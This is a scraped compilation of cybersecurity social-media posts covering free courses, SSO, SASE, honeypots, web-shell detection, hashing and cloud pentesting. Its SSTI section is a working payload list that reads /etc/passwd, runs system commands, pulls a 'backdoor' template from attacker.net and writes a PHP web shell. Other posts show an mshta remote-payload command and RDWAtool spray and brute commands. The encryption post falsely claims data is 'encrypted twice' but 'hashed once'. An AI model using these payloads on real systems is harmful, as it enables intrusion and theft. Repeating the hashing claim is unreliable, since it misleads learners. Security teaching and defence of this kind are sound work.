🦑FREE courses to boost your skills! 📈

1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h

Ref: Mohamed Hamdi
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New SSTI (Server Side Template Injection) - Payloads

Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}

PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}

Ref: Aman Dara
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 LOLbins attacks :

mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.

During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.

The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.

Note : These logs revealed suspicious PowerShell commands executing obfuscated scripts.

Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.

Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:

1>Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2>Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.

Sample Code : mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"

hashtag#incidentresponse hashtag#dfir hashtag#soc hashtag#cybersecurity hashtag#mitre hashtag#attack hashtag#windows

Ref: Soumick kar
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

𝐒𝐀𝐌𝐀 𝐂𝐲𝐛𝐞𝐫𝐬𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐀𝐮𝐝𝐢𝐭 𝐂𝐡𝐞𝐜𝐤𝐥𝐢𝐬𝐭

🦑SSO (Single Sign-On) Explained.

SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.

In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamlines user experience.

To fully understand the SSO process, 𝗹𝗲𝘁’𝘀 𝘁𝗮𝗸𝗲 𝗮 𝗹𝗼𝗼𝗸 𝗮𝘁 𝗵𝗼𝘄 𝗮 𝘂𝘀𝗲𝗿 𝘄𝗼𝘂𝗹𝗱 𝗹𝗼𝗴 𝗶𝗻𝘁𝗼 𝗟𝗶𝗻𝗸𝗲𝗱𝗜𝗻 𝘂𝘀𝗶𝗻𝗴 𝗚𝗼𝗼𝗴𝗹𝗲 𝗮𝘀 𝘁𝗵𝗲 𝗶𝗱𝗲𝗻𝘁𝗶𝘁𝘆 𝗽𝗿𝗼𝘃𝗶𝗱𝗲𝗿:

𝟭) 𝗨𝘀𝗲𝗿 𝗿𝗲𝗾𝘂𝗲𝘀𝘁𝘀 𝗮𝗰𝗰𝗲𝘀𝘀

First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".

𝟮) 𝗔𝘂𝘁𝗵𝗲𝗻𝘁𝗶𝗰𝗮𝘁𝗶𝗼𝗻 𝗿𝗲𝗾𝘂𝗲𝘀𝘁

From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.

𝟯) 𝗜𝗱𝗣 𝗰𝗵𝗲𝗰𝗸𝘀 𝗳𝗼𝗿 𝗮𝗰𝘁𝗶𝘃𝗲 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.

𝟰) 𝗨𝘀𝗲𝗿 𝘀𝘂𝗯𝗺𝗶𝘁𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).

𝟱) 𝗜𝗱𝗣 𝘃𝗲𝗿𝗶𝗳𝗶𝗲𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.

𝟲) 𝗜𝗱𝗣 𝘀𝗲𝗻𝗱𝘀 𝘁𝗼𝗸𝗲𝗻 𝘁𝗼 𝗦𝗲𝗿𝘃𝗶𝗰𝗲 𝗣𝗿𝗼𝘃𝗶𝗱𝗲𝗿

Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provier (LinkedIn).

𝟳) 𝗔𝗰𝗰𝗲𝘀𝘀 𝗴𝗿𝗮𝗻𝘁𝗲𝗱 𝘂𝘀𝗶𝗻𝗴 𝗲𝘅𝗶𝘀𝘁𝗶𝗻𝗴 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Since the Identity Provider has established a session, when the user goes to access a different Service Provider (eg; GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.

SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.

💭 What's your favourite way to go about authentication? 💬

Ref: Nikki SiapnoNikki Siapno
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Extracting information remotely from Microsoft Remote Desktop Web Access (RDWA) with RDWAtool

🔍 Microsoft Remote Desktop Web Access (RDWA) applications are often overlooked yet can be a treasure trove of information for attackers. RDWAtool is a Python-based all-in-one tool designed to analyze and test RDWA instances for vulnerabilities while extracting valuable insights.
🛠 What can RDWAtool do?

1️⃣ Extract useful Information in black box remotely:
- FQDN of the remote server to map the environment.
- Internal AD domain name derived from the FQDN.
- Remote Windows Server version for targeted exploitation.

In spray mode:

rdwatool spray -tu https://rds.podalirius.net/RDWeb/Pages/en-US/login.aspx

In brute mode:

rdwatool brute -tu https://rds.podalirius.net/RDWeb/Pages/en-US/login.aspx

> Free <
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑💰 Cost Savings: SSE vs. SASE Simplified!

🌐 Organizations leveraging Palo Alto Networks experience significant ROI through unified management and simplified operations—all within a single pane of glass.
Streamline your security strategy while accelerating growth!
What’s the Difference?

🟠 SSE (Security Service Edge):
Focuses on securing access to apps and data for remote and on-premises users.
Core features: SWG, CASB, and ZTNA for seamless, secure connectivity.

🟠 SASE (Secure Access Service Edge):
Combines networking (SD-WAN) and security services in a single cloud-delivered solution.

Perfect for securing distributed users and sites with optimal performance.
Why Choose Palo Alto Networks?

✔️ Unified platform for better visibility and control.
✔️ Simplified operations with scalable solutions for all use cases.
✔️ Future-ready security with proven innovation.

Let’s make security smarter, faster, and simpler—together!

Ref: Dhari A.Dhari A.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Honeypot Integration with Elastic Stack - A Practical Guide 🛡

In this project , i have integrated Honeypot (trap for hackers) with the ELK Stack to monitor the real-time alerts and advanced threat hunting. 🕵️‍♂️
🔧 Key Steps:

1️⃣ Honeypot Setup: Deployed multiple honeypot services to capture malicious activity. (Requires a public IP 🌐)

2️⃣ ELK Stack Installation: The Elastic Stack plays a pivotal role in collecting, storing, and visualizing the data from the T-Pot honeypot. 📊

3️⃣ Data Filtration & Visualization: Filtered and visualized attack data in Kibana for actionable insights. 🔍📈

Note : This project can be extended to capture the IOC’s like users can add their own threat intelligence databases and can use python scripts to train the machine learning models for future use .🔒For instance , a MISP instance can be setup to store the IOC's from this honeypot.

Ref: HAMZA JAMEEL
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 ShellSweep: Detecting Web Shells Made Easy for Defenders 🚀

🐚 What is ShellSweep?
ShellSweep is a suite of open-source tools designed to detect web shells using entropy analysis, static code checks, and heuristic methods. From incident response to threat hunting, ShellSweep helps defenders identify suspicious files quickly and efficiently.

🛠Why Defenders Need ShellSweep
✅ Test Your Coverage: Validate analytic detection for file mods, process executions, and suspicious behavior from web shells.
✅ Tuning & Training: Scan web servers, analyze entropy baselines, and tune detection to YOUR environment.
✅ Lightweight & Customizable: Works locally, supports PowerShell, Python, and Lua. Full control with zero dependency on external services.

🐚 ShellSweep: The foundation.
- Detects web shells using entropy-based analysis.
- Scans key extensions (.asp, .aspx, .php, .jsp) for high-entropy anomalies.
- Outputs file paths, entropy values, and hashes.

🐚🐚 ShellSweepPlus: Enhanced detection.
- Dynamic entropy thresholds.
- Multi-layered detection: Entropy, StdDev, Mixed Mode, and Heuristics.
- Static code analysis to spot malicious patterns.
- JSON outputs for structured results & further analysis.

🐚🐚🐚 ShellSweepX: Next-level, centralized detection.
- Combines entropy analysis, machine learning, and YARA rule matching.
- Cross-platform (PowerShell, Python, Bash).
- API integration for automated scans and result management.
- Web interface for visualizing and managing detections.

✨ Perfect for Incident Responders & Threat Hunters
🛡 Deploy ShellSweep tools in test or production environments.
🔍 Load up your preferred web shells, simulate uploads, and refine detection rules.
📈 Detect new or obfuscated threats. Identify gaps. Tune your defenses.

🧰 ShellSweep: ShellSweeping the Evil!

Ref: Michael H.Michael H.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Encryption vs Hashing - What's the difference?

Imagine you have a secret recipe for a cake, and you want to share it with a friend.

🤵Encryption:

You lock the recipe in a box with a key and give the box to your friend.

Your friend can unlock the box (with the key you gave them) and read the recipe.

If someone else finds the box without the key, they can't read it.
Key Point: It can be reversed if you have the key (decrypt it).

🧛Hashing:

You put the recipe in a blender and blend it into a unique smoothie.

Now it’s impossible to get the original recipe back from the smoothie.

But if someone else blends the exact same recipe, they’ll get the exact same smoothie.

Key Point: One-way process. You can’t go back to the recipe, but you can check if two smoothies match.

In short:

Encryption is like locking something up—can be unlocked.

Hashing is like turning it into mush—you can’t un-mush it!

As both methods involve turning data into a scrambled form, one might consider these two the same. However, there is a distinction you must know about:

Data is encrypted twice while it’s only hashed once.

One can encrypt/decrypt a piece of data, meaning that the original text can be retrieved back. However, retrieval of plain text isn’t possible if data is hashed once.

Ref: Santosh Nandakumar
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cloud Pentesting Cheatsheet🛡

Cloud penetration testing is a crucial skill to identify vulnerabilities in cloud environments like AWS, Azure, and Google Cloud Platform (GCP). This cheatsheet simplifies complex concepts and helps you take your cloud security game to the next level!

📘What’s Inside?
1️⃣ Key Testing Steps:
• Reconnaissance: Identify misconfigured assets, open ports, and exposed services in the cloud.
• Enumeration: Gather details about cloud accounts, storage buckets, APIs, and permissions.
• Exploitation: Simulate attacks by exploiting misconfigurations, weak access controls, or privilege escalation opportunities.
• Post-Exploitation: Assess the impact by reviewing data leakage and persistence mechanisms.

2️⃣ Cloud-specific Vulnerabilities:
• Misconfigured IAM roles and policies leading to unauthorized access.
• Publicly accessible storage buckets exposing sensitive data.
• Weak or absent encryption protocols for data in transit or at rest.
• Exploitable serverless functions (e.g., AWS Lambda) due to insecure coding practices.
• Over-permissive security groups allowing unrestricted traffic.

3️⃣ Essential Tools for Cloud Pentesting:
• ScoutSuite: Multi-cloud security auditing.
• Pacu: AWS exploitation framework for testing security.
• Cloudsploit: Scan configurations for security issues.
• Burp Suite: Analyze APIs in cloud applications.
• Nmap: Detect open ports and vulnerable services in the cloud.
• AWS CLI and GCP CLI: Enumerate configurations directly from the command line.

4️⃣ Best Practices:
• Use least privilege policies for all IAM roles and accounts.
• Enable logging and monitoring through services like AWS CloudTrail or Azure Monitor.
• Apply encryption standards (TLS, AES-256) to protect sensitive data.
• Regularly perform compliance checks using CIS Benchmarks and OWASP Cloud Top 10.

✨ Key Areas to Focus On:

🔑 Authentication and Authorization Flaws:
• Check for mismanaged credentials (e.g., leaked keys or weak passwords).
• Review SSO configurations for potential bypass scenarios.

📂 Storage Misconfigurations:
• Detect open storage buckets or public file access.
• Ensure data is encrypted and access is controlled through proper permissions.

📡 Network Security Risks:
• Audit firewall rules and security groups to detect overly permissive settings.
• Identify exposed management ports (SSH, RDP, etc.).

🔄 Serverless Security Issues:
• Look for weak input validation and insecure API integrations in serverless applications.
• Check timeout and resource limits to mitigate DoS risks.

Ref: Santosh Nandakumar
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁